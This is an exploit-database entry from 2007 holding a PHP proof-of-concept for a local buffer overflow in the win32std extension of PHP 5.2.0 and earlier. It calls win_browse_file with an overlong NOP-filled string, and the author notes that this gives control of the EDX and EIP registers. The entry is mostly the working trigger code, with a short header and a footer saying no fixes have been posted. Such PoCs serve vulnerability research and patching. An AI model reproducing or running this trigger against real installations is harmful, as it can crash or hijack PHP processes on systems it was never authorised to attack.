PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)

2007-08-18 00:00:00

<?php
// ==================================================================================
//
// php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
// [x] Discovery: boecke <[email protected]>
// [x] Risk: Local Buffer Overflow (Medium - High Risk)
// [x] Notes: EDX and EIP are able to be controlled and therefore
// have the potential to dictate program flow.
//
// [x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================

if ( !extension_loaded("win32std") )
{
die;
}

win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );

?>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.